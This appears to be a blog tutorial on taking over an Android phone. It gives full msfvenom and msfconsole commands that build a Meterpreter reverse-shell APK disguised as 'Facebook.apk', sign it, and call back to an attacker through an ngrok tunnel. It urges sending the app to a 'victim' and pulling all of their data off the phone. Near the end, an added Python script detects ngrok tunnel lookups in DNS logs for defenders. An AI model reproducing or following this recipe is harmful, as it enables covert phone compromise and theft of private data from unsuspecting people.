Hacking Android — Without Port Forwarding

Hello.
Today I will be writing about how you can use your Linux environment to hack an Android device. We won’t be using any vulnerability in Android; rather, we will abuse the permissions required to install an app on Android and take over the entire module.

So let’s begin:
[My blog’s instructions are for a Linux environment. You can use VMware or dual boot to run Linux or another Debian-based OS.]

  1. First, sign up on ngrok, or log in if you have already created an account, to get the AuthToken and to download the ngrok bridge file to your Linux machine.
  2. After you have downloaded the file, create a folder named ‘ngrok’ in your ‘bin’ folder and paste the file into that folder.
  3. Now open up your terminal and type the following commands:

    cd bin
    cd ngrok

  4. You need to copy your AuthToken, which you’ll get after signing up on ngrok. See the picture in ‘Step 1’ for the procedure to get yours.
  5. Your AuthToken might look like this: “2Lpi8tCY86c3D1kGt3eWN_2KuEEV7HZNFN2FUt9r55t”. Type the following command to enter the AuthToken in your .xml file in bin.

    ./ngrok authtoken 'YOUR_AUTHTOKEN'

  6. The next step is to assign the port:

    ./ngrok http 80

  7. The port number ‘80’ can be replaced by any port. Once you are done with the above command, your web interface will be set up.
  8. At this point our secured tunnel to our localhost is established, so it’s time to generate the .apk file that we will be forwarding to our victim.
  9. Note down ‘https://e7f7ad8c.ngrok.io -> localhost:80’ (you’ll have a different forwarding link, so copy yours) from your previous terminal. Open up a new terminal and run the command to generate the .apk file for the victim Android user.

    msfvenom -p android/meterpreter/reverse_tcp LHOST=e7f7ad8c.ngrok.io LPORT=80 R >/root/Desktop/Facebook.apk

    After running the above command with your own link and your chosen port number, a ‘Facebook.apk’ will be generated on the Desktop.

  10. For the above msfvenom command:
    -p   –> Specifies the payload
    android/meterpreter/reverse_tcp  –> Sets the nature of the file, i.e. android/windows.
    lhost –> The address where the data will be monitored
    lport –> The port number
    R >/root/Desktop/Facebook.apk –> Directory and the name of the file you want.
  11. As Android no longer allows applications that aren’t signed correctly, you have to sign it too.
    Clone the repository from GitHub:

    git clone https://github.com/techexpertize/SignApk

    Once SignApk is cloned/downloaded from GitHub, move it to your Desktop and move the ‘Facebook.apk’ file into the same folder.

  12. Now go into the SignApk folder from the command line.
  13. Open ‘Signing.txt’, copy the entire path, paste it into your command line, and then replace ‘your-app.apk your-app-signed.apk’ with your file names. Once changed, press the Enter key. Refer to the picture below. Great, the apk file is now bound with the signature.
  14. It’s time to start the payload listener in our terminal. Open the terminal and type:

    msfconsole

After ‘msfconsole’, the following commands need to be executed:
a) use exploit/multi/handler
b) set PAYLOAD android/meterpreter/reverse_tcp
c) set lhost e7f7ad8c.ngrok.io
d) set lport 80 //Your port Number and URL which you got from ‘Step: 7’
e) exploit -j

  15. It’s time for you to use your skills and forward the .apk file to the victim Android user and let it get installed on the device.
  16. Once the file is installed, your terminal will automatically connect you to the Android device. What basically happened here is that you gave the apk file all permissions, enough permissions to take over your Android.
Now you own HIM or HER completely.

  17. Type ‘-h’ and hit Enter to get all the commands you can use to get the data out of the phone.

Use the commands to get all the data from the victim Android user directly on your PC. Read the descriptions so that you’ll know which command is used for which purpose.
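
For defenders, the callback in this walkthrough is visible on the network: the installed app has to resolve the ngrok forwarding hostname before it can connect. The following is an added example, not part of the original post, that scans resolver logs for lookups of tunnel hostnames; the log format, client IPs and function names are assumptions, and the sample lines are constructed.

```python
from collections import defaultdict

# Tunnel suffix taken from the forwarding hostname shown on this page.
TUNNEL_SUFFIXES = ("ngrok.io",)

# Constructed sample resolver log; assumed format: "<timestamp> <client-ip> <query-name>"
SAMPLE_LOG = """\
2018-10-12T20:41:07Z 10.0.8.23 graph.facebook.com
2018-10-12T20:41:09Z 10.0.8.23 E7F7AD8C.ngrok.io.
2018-10-12T20:41:39Z 10.0.8.23 e7f7ad8c.ngrok.io
2018-10-12T20:42:10Z 10.0.8.40 ngrok.io.example.com
2018-10-12T20:42:15Z 10.0.8.40 notngrok.io
2018-10-12T20:43:02Z 10.0.8.51 ngrok.io
malformed line
"""

def normalize(qname):
    """Lower-case the name and drop the trailing root dot."""
    return qname.rstrip(".").lower()

def is_tunnel_host(qname):
    """True only for a subdomain of a tunnel suffix (label-aware, not a substring match)."""
    name = normalize(qname)
    return any(name.endswith("." + suffix) for suffix in TUNNEL_SUFFIXES)

def find_tunnel_clients(log_text):
    """Return {client_ip: {hostname: [first_seen, query_count]}} for tunnel lookups."""
    hits = defaultdict(dict)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue  # skip lines that do not fit the assumed format
        ts, client, qname = parts
        if not is_tunnel_host(qname):
            continue
        # Keep the first timestamp seen for this client/host pair, count every query.
        entry = hits[client].setdefault(normalize(qname), [ts, 0])
        entry[1] += 1
    return dict(hits)

if __name__ == "__main__":
    for client, hosts in find_tunnel_clients(SAMPLE_LOG).items():
        for host, (first_seen, count) in hosts.items():
            print(f"{client} resolved {host} {count}x, first seen {first_seen}")
```

The bare `ngrok.io` lookup is deliberately not flagged, since only subdomains are forwarding endpoints; lookalike names such as `notngrok.io` are rejected by the label-aware suffix check.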

 

That’s all there is to it. If you hit any error, need any help, or have any feedback, you can share it in the comments or mail me.

THANK YOU
